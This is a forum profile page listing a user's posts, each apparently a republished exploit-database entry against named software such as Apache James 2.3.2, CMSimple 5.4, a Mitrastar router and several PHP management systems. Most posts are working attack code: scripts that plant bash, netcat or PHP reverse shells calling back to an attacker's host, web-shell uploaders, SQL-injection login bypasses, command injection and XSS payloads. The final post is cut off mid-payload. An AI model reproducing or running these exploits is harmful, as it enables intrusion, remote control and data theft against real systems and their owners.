Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2) # Date: 27/09/2021 # Exploit Author: shinris3n # Vendor Homepage: http://james.apache.org/server/ # Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip # Version: Apache James Server 2.3.2 # Tested on: Ubuntu # Info: This exploit works on default installation of Apache James Server 2.3.2 # Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d ''' This Python 3 implementation is based on the original (Python 2) exploit code developed by Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec. The following modifications were made: 1 - Made required changes to print and socket commands for Python 3 compatibility. 1 - Changed the default payload to a basic bash reverse shell script and added a netcat option. 2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2. 3 - Added a payload that can be used for testing remote command execution and connectivity. 4 - Added payload and listener information output based on payload selection and user input. 5 - Added execution output clarifications and additional informational comments throughout the code. @shinris3n https://twitter.com/shinris3n https://shinris3n.github.io/ ''' #!/usr/bin/python3 import socket import sys import time # credentials to James Remote Administration Tool (Default - root/root) user = 'root' pwd = 'root' if len(sys.argv) != 4: sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0]) sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0]) sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n") sys.exit(1) remote_ip = sys.argv[1] local_ip = sys.argv[2] port = sys.argv[3] # Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH) payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login #payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell #payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity #payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only print ("[+]Payload Selected (see script for more options): ", payload) if '/bin/bash' in payload: print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port) def recv(s): s.recv(1024) time.sleep(0.2) try: print ("[+]Connecting to James Remote Administration Tool...") s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary. s.recv(1024) s.send((user + "\n").encode('utf-8')) s.recv(1024) s.send((pwd + "\n").encode('utf-8')) s.recv(1024) print ("[+]Creating user...") s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8')) s.recv(1024) s.send("quit\n".encode('utf-8')) s.close() print ("[+]Connecting to James SMTP server...") s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary. s.send("ehlo team@team.pl\r\n".encode('utf-8')) recv(s) print ("[+]Sending payload...") s.send("mail from: <'@team.pl>\r\n".encode('utf-8')) recv(s) # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8')) recv(s) s.send("data\r\n".encode('utf-8')) recv(s) s.send("From: team@team.pl\r\n".encode('utf-8')) s.send("\r\n".encode('utf-8')) s.send("'\n".encode('utf-8')) s.send((payload + "\n").encode('utf-8')) s.send("\r\n.\r\n".encode('utf-8')) recv(s) s.send("quit\r\n".encode('utf-8')) recv(s) s.close() print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).") if '/bin/bash' in payload: print ("[+]Don't forget to start a listener on port", port, "before logging in!") except: print ("Connection failed.")
  2. HireHackking

    WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) # Date: 2/15/2021 # Author: 0xB9 # Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip # Version: 1.3.1 # Tested on: Windows 10 # CVE: CVE-2021-24287 1. Description: The tab parameter in the Admin Panel is vulnerable to XSS. 2. Proof of Concept: wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
  3. HireHackking

    WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS) # Date: 2/3/2021 # Author: 0xB9 # Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip # Version: 1.3.0 # Tested on: Windows 10 # CVE: CVE-2021-24286 1. Description: This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS. 2. Proof of Concept: wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
  4. HireHackking

    Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 28.09.2021 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14932&title=Storage+Unit+Rental+Management+System+using+PHP+Free+Source+Code # Version: 1 # Tested on: Ubuntu import requests from bs4 import BeautifulSoup import sys import random import string import time if len(sys.argv) != 4: print("[~] Usage : python3 exploit.py localhost ip port") exit() site = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>" letters = string.ascii_lowercase name = ''.join(random.choice(letters) for i in range(5)) def LoginAndShellUpload(): login = 'http://'+site+':80/storage/classes/Login.php?f=login' session = requests.session() post_data = {"username": "' OR 1=1-- -", "password": "aa"} user_login = session.post(login, data=post_data) cookie = session.cookies.get_dict() print('[+]Success login') print('[+]Try Shell upload') time.sleep(2) #shell upload url = 'http://'+site+':80/storage/classes/SystemSettings.php?f=update_settings' cookies = cookie headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------246884504016047375913085888751", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/storage/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} data = "-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nStorage Unit Rental Management System - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nSURMS - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"cover\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------246884504016047375913085888751--\r\n" requests.post(url, headers=headers, cookies=cookies, data=data) print('[+]Success!') print('[+]Getting reverse shell') time.sleep(2) def RCE(): path = 'http://'+site+'/storage/uploads/' html_text = requests.get(path).text soup = BeautifulSoup(html_text, 'html.parser') for link in soup.find_all('a'): data = link.get('href') with open('shell_location.txt', 'w') as f: f.write(data) path2 = 'shell_location.txt' shell_file = open(path2,'r') shell = shell_file.readline() r = requests.get('http://'+site+'/storage/uploads/'+shell) print(r.text) print('[+]Hacked!') LoginAndShellUpload() RCE()
  5. HireHackking

    Mitrastar GPT-2541GNAC-N1 - Privilege escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation # Date: 10-08-2021 # Exploit Author: Leonardo Nicolas Servalli # Vendor Homepage: www.mitrastar.com # Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU) # Tested on: Firmware BR_g3.5_100VNZ0b33 # Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md Description: ---------- # Mitrastar GPT-2541GNAC-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials). # The command “deviceinfo show file <path>” is used from reduced CLI to show files and directories. Because this command do not handle correctly special characters, is possible to insert a second command as a parameter on the <path> value. By using “&&/bin/bash” as parameter value we can spawn a bash console, as seen on the next example: Exploit: -------- > deviceinfo show file &&/bin/bash # This command will spawn a full interoperable bash console with root privileges.
  6. HireHackking

    Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi) # Date: 28.09.2021 # Exploit Author: Murat # Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip # Version: 1.0 # Tested on: Windows 10 # Pharmacy Point of Sale System v1.0 SQLi GET /pharmacy/view_product.php?id=-1 HTTP/1.1 Host: localhost Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6 Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Connection: close POC: https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1-- ----------------------------------------------------------------------- #Other parameters with sql injection vulnerability; ==> /pharmacy/?date_from=&date_to=1'"&page=sales_report ==> /pharmacy/?date_from=1'"&date_to=&page=sales_report ==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1 ==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true ==> /pharmacy/manage_product.php?id=-1' ==> POST /pharmacy/Actions.php?a=save_stock ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="supplier_id" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="product_id" 2'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="quantity" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="expiry_date" ==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id" 5'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="product_code" 94102'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="category_id" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="name" pHqghUme'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="price" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="description" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="status" 0'" ------------YWJkMTQzNDcw-- -
  7. HireHackking

    Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated) # Date: 29.09.2021 # Exploit Author: pussycat0x # Vendor Homepage: https://www.cmsimple.org/ # Version: 5.4 # Tested on: ubuntu-20.04.1 import argparse from bs4 import BeautifulSoup from argparse import ArgumentParser import requests parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport') rparser = parser.add_argument_group('required argument') rparser.add_argument('-url','--host', type=str, help='target domain',required=True) rparser.add_argument('-u' ,'--username', type=str, help='', required=True) rparser.add_argument('-p','--password',type=str,help='', required=True) rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True) rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True) args= parser.parse_args() #url ='192.168.1.106' s = requests.Session() def main(): try: url =(args.host) payload = { 'user':args.username, 'passwd':args.password, 'submit': 'Login', 'login':'true', } login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload) if login.status_code == 200: print('Exploit Completed') else: print("Invalid Credential") cook =(login.cookies.get_dict()) temp = s.get(url +'/?file=template&action=edit', cookies=cook) soup = BeautifulSoup(temp.text, 'lxml') csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value'] #<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); rev = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/""" rev2=(args.lhost) rev3=(args.lport) rev4=""" 0>&1'");""" php =(rev+rev2+'/'+rev3+rev4) revpayload = { 'cmsimpleDataFileStored':'cmsimpleDataFileStored', 'csrf_token':csrfToken, 'text':php, 'file':'template', 'action':'save', } shell = s.post(url +'/',cookies=cook , data=revpayload) exec = s.get(url+'/') exit() except: pass main()
  8. HireHackking

    Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass # Date: 29-09-2021 # Exploit Author: sudoninja # Vendor Homepage: https://phpgurukul.com # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ # Version: 1.0 # Tested on: XAMPP / Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/ccms/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ccms Step 5 – Click forward and now you will be logged in as admin. POC POST /ccms/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/ccms/ Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du Upgrade-Insecure-Requests: 1 username='%20OR%201%20--%20-&password=ccms&login=
  9. HireHackking

    OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS) # Date: 9/24/2021 # Exploit Author: Eric Salario # Vendor Homepage: http://www.os4ed.com/ # Software Link: https://opensis.com/download # Version: 8.0 # Tested on: Windows, Linux # CVE : CVE-2021-40310 OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter. 1. Login as "teacher". 2. Navigate to (take attendance): http://demo.opensis.com/ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true Decoded request: GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1 3. XSS triggers PoC Video: https://www.youtube.com/watch?v=aPKPUDmmYpc
  10. HireHackking

    Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 28.09.2021 # Author: Mr.Gedik # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html # Version: 1.0 # https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB Vulnerable code controllers/add_petmanagement.php Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"], $_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" . addslashes($_FILES["images"]["name"])); Exploit ############# <?php /* @author:mrgedik */ function anim($msg, $time) { $msg = str_split($msg); foreach ($msg as $ms) { echo $ms; usleep($time); } } anim("__ __ _____ _ _ _ | \/ | / ____| | (_) | | \ / |_ __| | __ ___ __| |_| | __ | |\/| | '__| | |_ |/ _ \/ _` | | |/ / | | | | |_ | |__| | __/ (_| | | < |_| |_|_(_) \_____|\___|\__,_|_|_|\_\ ", 900); echo PHP_EOL; while(1) { echo anim("Target (http://example.com/path/): ", 800); $target = trim(fgets(STDIN)); echo PHP_EOL; if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) { echo "Not a valid URL".PHP_EOL; }else { break; } } @unlink("exp.php"); $fw = fopen("exp.php","a+"); fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>'); fclose($fw); $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php"); $fields = [ 'images' => new \CurlFile("exp.php", 'image/png', 'exp.php') ]; curl_setopt($ch, CURLOPT_POSTFIELDS, $fields); $response = curl_exec($ch); @unlink("exp.php"); if(strstr($response,"success")) { while(1) { echo anim("root@pwn: ", 800); $command = trim(fgets(STDIN)); if($command == trim("exit")) { exit; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); echo curl_exec($ch); curl_close ($ch); } }else { echo anim("Fail", 800); } ?>
  11. HireHackking

    Blood Bank System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Blood Bank System 1.0 - Authentication Bypass # Date: 30-9-2021 # Exploit Author: Nitin Sharma (vidvansh) # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/ # Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230 # Version: 1.0 # Tested on: Windows 10 , Apache , Mysql # Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts. #Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. Step 5 – Click forward and now you will be logged in as admin. # PoC: GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://localhost Connection: close Referer: http://localhost/bloodbank/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 # Authentication Bypass: # Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password => Username: ** Random email** Password: ' or 1 -- -
  12. HireHackking

    Exam Form Submission System 1.0 - SQL Injection Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass # Date: 30-09-2021 # Exploit Author: Nitin Sharma (Vidvansh) # Vendor Homepage: https://code-projects.org # Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/ # Version: 1.0 # Tested on: XAMPP / Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/EXAM_FORM_SUBMISSION/admin/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. Step 5 – Click forward and now you will be logged in as admin. POC POST /EXAM_FORM_SUBMISSION/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 40 Origin: http://localhost Connection: close Referer: http://localhost/EXAM_FORM_SUBMISSION/admin/index.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login
  13. HireHackking

    Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 30.09.2021 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code # Version: 1.0 # Tested on: Ubuntu import requests from bs4 import BeautifulSoup import sys import random import string import time print(""" [+] Vehicle Service Management System [!] Auth bypass + shell upload = RCE """) time.sleep(2) if len(sys.argv) != 4: print("[~] Usage : python3 exploit.py localhost ip port") exit() site = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>" letters = string.ascii_lowercase name = ''.join(random.choice(letters) for i in range(5)) def LoginAndShellUpload(): print("[+] Try Login") time.sleep(1) login = 'http://'+site+'/vehicle_service/admin/login.php' session = requests.session() post_data = {"username": "' OR 1=1-- -", "password": "aa"} user_login = session.post(login, data=post_data) cookie = session.cookies.get_dict() print('[+]Success login') print('[+]Try Shell upload') time.sleep(2) #shell upload url = 'http://'+site+'/vehicle_service/classes/SystemSettings.php?f=update_settings' cookies = cookie headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------34590800438205826044276614708", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/church_management/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} data = "-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nVehicle Service Management System\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nVSMS - PHP\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"about_us\"\r\n\r\n<p style=\"text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;\">About Us</p><hr style=\"margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));\"><div id=\"Content\" style=\"margin: 0px; padding: 0px; position: relative;\"><div id=\"bannerL\" style=\"margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);\"></div><div id=\"bannerR\" style=\"margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);\"></div><div class=\"boxed\" style=\"margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: center; background-color: rgb(255, 255, 255);\"><div id=\"lipsum\" style=\"margin: 0px; padding: 0px; text-align: justify;\"></div></div></div><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non ultrices tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et malesuada fames ac ante ipsum primis in faucibus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Praesent eleifend interdum est, at gravida erat molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at lacus vehicula, aliquam purus quis, pharetra lorem.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Proin consectetur massa ut quam molestie porta. Donec sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend id, aliquet ut libero. Nunc scelerisque vulputate turpis quis volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum imperdiet, nulla vitae pharetra pretium, magna felis placerat libero, quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci, id vehicula tellus eleifend sit amet.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Morbi id ante vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus pulvinar, eros id ultricies mollis, lectus velit viverra mi, at venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula pretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Ut et urna sapien. Nulla lacinia sagittis felis id cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada, vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque mauris. Quisque sit amet varius augue.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Sed quis imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus lorem mollis. Fusce ut 